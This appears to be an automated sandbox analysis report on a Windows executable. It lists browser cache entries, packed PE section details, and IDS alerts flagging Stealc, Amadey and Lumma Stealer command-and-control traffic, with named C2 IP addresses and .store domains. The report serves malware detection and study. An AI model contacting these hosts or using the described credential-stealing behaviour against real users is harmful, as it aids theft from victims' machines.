Preview:	.....G...O=E.f.s8...F.......<... .....s.......... ....................9.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........A.L.F.O.N.S.-.P.C.\.a.l.f.o.n.s...................0.................".@3P.........................

Chrome Cache Entry: 494

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (4325)
Category:	downloaded
Size (bytes):	4330
Entropy (8bit):	5.827145718034291
Encrypted:	false
SSDEEP:	96:ThtM/liDFd66666RT1UgCOpnAk2krVF0Vk7D4/zjN7e2M9O7t9zKTfffffX:TDMdYFd66666d1UQNAfy2k7DyzjA2MGI
MD5:	C3E60709859F0CDC078143D48A20CCF3
SHA1:	30BEA008A3F33BC9A05653F0BA2271CC9056B108
SHA-256:	1DDDD121C16AACDAEE9E8F3242E9F8504241FABC4ED57D04EF741D689C73C6C2
SHA-512:	7AC5B5533C03A38E09E3183B9F0FFC8D4E4D03BA981FE2928B8E0E89F86B1A6CC3865161A83BA4BF168B9DF636D23B39F5D3C19DADCAB52064DA936851BD3B2D
Malicious:	false
URL:	https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
Preview:	)]}'.["",["what is on 60 minutes tonight","barcelona vs real sociedad lamine yamal","disclaimer finale","dragon age veilguard fire and ice","43 monkeys escaped south carolina","bears vs patriots game","deadpool wolverine","starlink satellites"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"google:entityinfo":"Cg0vZy8xMWcwNzNjbHdsEgkyMDI0IGZpbG0ywxNkYXRhOmltYWdlL2pwZWc7YmFzZTY0LC85ai80QUFRU2taSlJnQUJBUUFBQVFBQkFBRC8yd0NFQUFrR0J3Z0hCZ2tJQndnS0Nna0xEUllQRFF3TURSc1VGUkFXSUIwaUlpQWRIeDhrS0RRc0pDWXhKeDhmTFQwdE1UVTNPam82SXlzL1JEODRRelE1T2pjQkNnb0tEUXdOR2c4UEdqY2xIeVUzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM04vL0FBQkVJQUVBQVFBTUJJZ0FDRVFFREVRSC94QUFjQUFBQ0F3QURBUUFBQUFBQUFBQUFBQUFHQndBRUJRSURDQUgveEFBekVBQUJBd0lGQXdJREJ3VUJBQUFBQUFBQkFnTUVCUkVBQmhJaE1STkJ

Chrome Cache Entry: 495

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	29
Entropy (8bit):	3.9353986674667634
Encrypted:	false
SSDEEP:	3:VQAOx/1n:VQAOd1n
MD5:	6FED308183D5DFC421602548615204AF
SHA1:	0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
SHA-256:	4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
SHA-512:	A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
Malicious:	false
URL:	https://www.google.com/async/newtab_promos
Preview:	)]}'.{"update":{"promos":{}}}

Chrome Cache Entry: 496

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2586)
Category:	downloaded
Size (bytes):	174097
Entropy (8bit):	5.554845848492248
Encrypted:	false
SSDEEP:	3072:49GysOAIZQy3ZZb6L5BfizRURkgq3ocEs7BB19HDKDSfEISlCMDyQhnF/VU9cpar:49G3IZP3ZZmHfiz+R7q3ocV7BB19HDKq
MD5:	292ACC11525E24B0501DEAC4EB7B61D4
SHA1:	4840E1B06489D1210E25C620AC0E4DEA33F4A574
SHA-256:	A5CB759FC6BF64DD1E35731C88899928B098A359EFF9CA5B34B91F23ADE02C2B
SHA-512:	FBDB4B2B4B647F734B6E05D0495CE1135E9536D611BC567A3B47353FEC986B92412153C214EFE776BC6391239076B3DA6B79851C8BE036C00E4AD026F88CC683
Malicious:	false
URL:	"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.ciOLm-Jy21Y.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTvi2-a6fPowp_OrDQczHs8e8wA2zQ"
Preview:	this.gbar_=this.gbar_\|\|{};(function(_){var window=this;.try{._.ej=class extends _.Q{constructor(){super()}};.}catch(e){_._DumpException(e)}.try{.var fj,gj,ij,lj,oj,nj,hj,mj;fj=function(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};gj=function(){_.Ka()};ij=function(){hj===void 0&&(hj=typeof WeakMap==="function"?fj(WeakMap):null);return hj};lj=function(a,b){(_.jj\|\|(_.jj=new hj)).set(a,b);(_.kj\|\|(_.kj=new hj)).set(b,a)};.oj=function(a){if(mj===void 0){const b=new nj([],{});mj=Array.prototype.concat.call([],b).length===1}mj&&typeof Symbol==="function"&&Symbol.isConcatSpreadable&&(a[Symbol.isConcatSpreadable]=!0)};_.pj=function(a,b,c){a=_.zb(a,b,c);return Array.isArray(a)?a:_.Kc};_.qj=function(a,b){a=(2&b?a\|2:a&-3)\|32;return a&=-2049};_.rj=function(a,b){a===0&&(a=_.qj(a,b));return a\|1};_.sj=function(a){return!!(2&a)&&!!(4&a)\|\|!!(2048&a)};_.tj=function(a,b,c){32&b&&c\|\|(a&=-33);return a};._.xj=function(a,b,c,d,e,f,g){const h=a.ha;var k=!!(2&b);e=k?1:e;

Chrome Cache Entry: 497

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65531)
Category:	downloaded
Size (bytes):	133706
Entropy (8bit):	5.433041137964253
Encrypted:	false
SSDEEP:	1536:i7C/VNgo7Yp+GhGLhJgJoamyeX43zGiJsKtPLx8OF97f4qlg1CFlOve2dzAcJ82O:fN7vhSJjxeX431PBLx8OF9jRYsci2i6o
MD5:	7FF6FF582099799BA0A8626D772BB879
SHA1:	DBE7CE1CEE63B039ADB6C4FAC4AAB433A3D06CBD
SHA-256:	B1521E600D39865087FCD268E9650A91E157D21BBB273991338804B8008CA76F
SHA-512:	A807A5CC7DE9E9B903FFD1BD5D413BA88763321F529220379DAECDD91C9F3ED6188DAF7B228502CF9EBBDD185DB007959B71188D65CF95F53EA130CC81A97E4D
Malicious:	false
URL:	https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
Preview:	)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

Chrome Cache Entry: 498

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1302)
Category:	downloaded
Size (bytes):	117949
Entropy (8bit):	5.4843553913091005
Encrypted:	false
SSDEEP:	3072:D7yvvjOy7sipKTr3dH39oogNLLDzZzS7oF:D7yjOy7LS39mnhS7oF
MD5:	A5D33473ED0997C008D1C053E0773EBE
SHA1:	FEB4CB89145601A0141CC5869BEDF9AE7CD5CB80
SHA-256:	14C27BB0224FCF89A43B444B427DABE3D0AF184CAA7B6B4990CE228C51AE01C1
SHA-512:	3C0A48F9FA05469F950D9A268F1B3E9285A783A555EE597A2E203B688EB0FBCAEA3F4DE9BC8F5381C661007D0C6C4AFA70C19B7826D69A0E2A914A55973D14BD
Malicious:	false
URL:	"https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0"
Preview:	gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a\|\|[]};(0,_._F_toggles_initialize)([0x800000, ]);.var da,ea,ha,na,oa,sa,ta,wa;da=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.la=ha(this);na=function(a,b){if(b)a:{var c=_.la;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}};.na("Symbol",function(a){if(a)r

Chrome Cache Entry: 499

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (5162), with no line terminators
Category:	downloaded
Size (bytes):	5162
Entropy (8bit):	5.3503139230837595
Encrypted:	false
SSDEEP:	96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
MD5:	7977D5A9F0D7D67DE08DECF635B4B519
SHA1:	4A66E5FC1143241897F407CEB5C08C36767726C1
SHA-256:	FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
SHA-512:	8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
Malicious:	false
URL:	"https://www.gstatic.com/og/_/ss/k=og.qtm.gyN29IQRsEA.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTthb_7uL8fi0CBKDba3xi6R0PUU9w"
Preview:	.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

Chrome Cache Entry: 500

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	1660
Entropy (8bit):	4.301517070642596
Encrypted:	false
SSDEEP:	48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
MD5:	554640F465EB3ED903B543DAE0A1BCAC
SHA1:	E0E6E2C8939008217EB76A3B3282CA75F3DC401A
SHA-256:	99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
SHA-512:	462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
Malicious:	false
URL:	https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.945467494861365
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'845'248 bytes
MD5:	c8bdae4b54ec9fb34babe5908c1273f1
SHA1:	53111c9f481f86109c4f045c7c65523d9f5906b0
SHA256:	fafd551638daa4ab17ebdc71f2bffd8599332b1f1e95409af51870502cd65e38
SHA512:	ab78acf0a806ad909c8c6e46d13e1428efa29eea35620e6a9a40f3b4e08333a6ae83671a39af96a14f0b71d2dd7f021b9354393fa0e4962d1c9b241a71814450
SSDEEP:	24576:Y7Y2nzJAFNcKtO5fE7T2rVP2DoKomRXvYU/S7VCiG3M02N7nVDJXgPGaoz7HkcKb:sYUzOHjSfE/+0RAhQ7j2RV1SGaAX1k
TLSH:	978533A9A3F74A85C14FBFBDD68F345FEE201C458EEDA4A835C490B898477888E3D514
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0xaad000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F10E0F6A36Ah
clts
sbb al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007F10E0F6C365h
add byte ptr [ebx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ebx], al
or al, byte ptr [eax]
add byte ptr [edx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], cl
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 0Ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x24b04d	0x61	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x24b1f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x249000	0x16200	37bb8b1c6e8a8a749729b2055f0a09c5	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x24a000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x24b000	0x1000	0x200	0d0399d83a742d5d86c5718841e8e842	False	0.134765625	data	0.8646718654202081	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x24c000	0x2b7000	0x200	656b6a602b0acd79458d2dfa16db5445	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
olxddulo	0x503000	0x1a9000	0x1a8a00	f127eee9903cc986e64e06614c014d44	False	0.9949438383132175	data	7.954298662543499	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
pxsrqflz	0x6ac000	0x1000	0x600	b9f1b45c024c0492908f285027c9a5ef	False	0.556640625	data	4.9907520315508656	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x6ad000	0x3000	0x2200	9021b5b5efbd5c4e15ac92624761d2c0	False	0.0705422794117647	DOS executable (COM)	0.7452825330731697	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-11T10:33:02.196042+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	49704	185.215.113.206	80	TCP
2024-11-11T10:33:02.399757+0100	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.5	49704	185.215.113.206	80	TCP
2024-11-11T10:33:02.405929+0100	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	185.215.113.206	80	192.168.2.5	49704	TCP
2024-11-11T10:33:02.604321+0100	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.5	49704	185.215.113.206	80	TCP
2024-11-11T10:33:02.615287+0100	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	185.215.113.206	80	192.168.2.5	49704	TCP
2024-11-11T10:33:03.592082+0100	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.5	49704	185.215.113.206	80	TCP
2024-11-11T10:33:04.271374+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49704	185.215.113.206	80	TCP
2024-11-11T10:33:21.998113+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.245.163.56	443	192.168.2.5	49761	TCP
2024-11-11T10:33:23.283544+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49747	185.215.113.206	80	TCP
2024-11-11T10:33:24.465595+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49747	185.215.113.206	80	TCP
2024-11-11T10:33:25.151140+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49747	185.215.113.206	80	TCP
2024-11-11T10:33:25.577089+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49747	185.215.113.206	80	TCP
2024-11-11T10:33:26.247620+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49747	185.215.113.206	80	TCP
2024-11-11T10:33:26.652970+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49747	185.215.113.206	80	TCP
2024-11-11T10:33:30.995874+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49908	185.215.113.16	80	TCP
2024-11-11T10:34:00.094724+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.245.163.56	443	192.168.2.5	50119	TCP
2024-11-11T10:34:04.872720+0100	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.5	50120	185.215.113.43	80	TCP
2024-11-11T10:34:07.698819+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	50122	185.215.113.16	80	TCP
2024-11-11T10:34:10.760695+0100	2057131	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store)	1	192.168.2.5	61903	1.1.1.1	53	UDP
2024-11-11T10:34:10.788678+0100	2057129	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store)	1	192.168.2.5	59312	1.1.1.1	53	UDP
2024-11-11T10:34:10.812975+0100	2057127	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store)	1	192.168.2.5	54467	1.1.1.1	53	UDP
2024-11-11T10:34:10.838333+0100	2057125	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store)	1	192.168.2.5	60463	1.1.1.1	53	UDP
2024-11-11T10:34:10.863244+0100	2057123	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store)	1	192.168.2.5	50326	1.1.1.1	53	UDP
2024-11-11T10:34:10.888058+0100	2057121	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store)	1	192.168.2.5	52803	1.1.1.1	53	UDP
2024-11-11T10:34:10.912886+0100	2057119	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (navygenerayk .store)	1	192.168.2.5	55647	1.1.1.1	53	UDP
2024-11-11T10:34:10.958584+0100	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.43	80	192.168.2.5	50121	TCP
2024-11-11T10:34:11.388665+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.5	50124	188.114.96.3	443	TCP
2024-11-11T10:34:11.388665+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50124	188.114.96.3	443	TCP
2024-11-11T10:34:11.600116+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	50123	185.215.113.43	80	TCP
2024-11-11T10:34:11.838347+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	50124	188.114.96.3	443	TCP
2024-11-11T10:34:11.838347+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50124	188.114.96.3	443	TCP
2024-11-11T10:34:12.243542+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	50125	185.215.113.16	80	TCP
2024-11-11T10:34:12.316320+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.5	50126	188.114.96.3	443	TCP
2024-11-11T10:34:12.316320+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50126	188.114.96.3	443	TCP
2024-11-11T10:34:13.202217+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	50126	188.114.96.3	443	TCP
2024-11-11T10:34:13.202217+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50126	188.114.96.3	443	TCP
2024-11-11T10:34:13.843697+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.5	50127	188.114.96.3	443	TCP
